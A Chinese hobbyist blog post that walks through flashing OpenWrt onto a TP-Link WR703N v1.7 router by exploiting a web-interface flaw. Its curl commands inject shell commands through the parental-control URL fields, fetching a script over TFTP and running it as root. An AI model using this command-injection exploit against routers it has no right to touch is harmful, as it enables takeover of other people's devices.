程序员码农的世界探索—发现:智能硬件

TP-LINK路由器WR703N刷openwrt固件挂载USB摄

2018-11-26  本文已影响8人  帅气的程小二

哈哈,折腾两天,终于弄好了,先来张照片提提神。
Pc端,火狐,火狐,火狐浏览器(重要的事情说三遍。。。。。。。。)

ios终端,5S的成像效果还是不错的

新版的wr703n不支持web方式刷机,无论选择什么样的.bin文件,最后都会提示选择的软件版本和硬件不符,不符,不符,就是不符,当时我走到这一步时下载了很多版本的.bin文件,还是不符,不过我泱泱大国不缺乏大牛,终于找到了一篇大牛写的利用web漏洞刷固件的博客(另外自己还可以用TTL先刷和编程器刷,这个没尝试过)

WR703N Ver1.7

开始啦,开始啦,激动人心的时刻开始了。
准备完毕,那么接下来就开始吧!

step1:
关闭无线(可以直接禁用无线网络),将本地连接ip修改为192.168.1.100,子网掩码255.255.255.0,网关192.168.1.1(注:ip其实可以随意,因为脚本里面写的是这个,所以就用这个就不用改脚本了,#-_-#你要是实在不喜欢100……那么记得把aa里面的一起改了),这个应该木有问题的

step2:
将路由器恢复出厂设置(找个取卡针啥的从Reset小孔插 进去,大概五秒钟灯会闪烁,松开就会重启了),然后用网线连接电脑。(注:插上以后可以进192.168.1.1看看,能进去而且是让你设置密码,那就没问题)

step3:
打开tftp,不需要修改设置,放在那里就好。

然后……重点来了,重点来了,注意了,我要变身了。
step4:
打开cmd,切换到该目录(就是放需要的文件的目录)下面
键入如下命令:

curl -o - -b "tLargeScreenP=1;subType=pcSub;Authorization=Basic%20
YWRtaW46YWRtaW40Mg%3D%3D;ChgPwdSubTag=true" "http://192.168.1.1/"

命令行窗口会回执html代码,这是正常情况,不必担心。

step5:
键入如下命令:

curl -o - -b "tLargeScreenP=1;subType=pcSub;Authorization=Basic%20Y
WRtaW46YWRtaW40Mg%3D%3D;ChgPwdSubTag=" --
referer "http://192.168.1.1/userRpm/ParentCtrlRpm.htm"
"http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-
00-00-00-02&Page=1"

命令行会跟上一步一样回执html代码。

step6:
键入如下命令:

curl -o - -b “tLargeScreenP=1;subType=pcSub;Authorization=Basic%20Y
WRtaW46YWRtaW40Mg%3D%3D;ChgPwdSubTag=” 
--referer “http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1” “http://192.168.1.1/userRpm/ParentCtrl
Rpm.htm?child_mac=00-00-00-00-0001&lan_lists=888&url_comment=test&url_0=;cd /tmp;&url_1
=;tftp -gl aa 192.168.1.100;&url_2=;sh aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=2
55&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=”

代码我会上传附件的,放心啦啦

此时命令行窗口会停止不动,tftp会出现传输提示,tftp有反应就基本成功了。
接下来只需要等待路由器自己重启即可。断电,重启,接下来就是见证奇迹的时刻了,打开Windows的cmd命令,输入telnet 192.168.1.1,能通说明就是好的啦。

(注:这三步的代码强烈建议直接复制,手敲很容易出问题!已将代码放在附件)
(注:路由器刷完之后只能通过有线方式连接)
(注:整个过程路由器不要断电,不要断电,不要断电,重要的事情说三遍,据说断电后会变成砖,我不敢试),固件库已经刷进去了,不过这个时候还不能上网啦,别急别急,下片博客我会详细教大家怎么配置网络。


关于我自己

上一篇 下一篇

猜你喜欢

热点阅读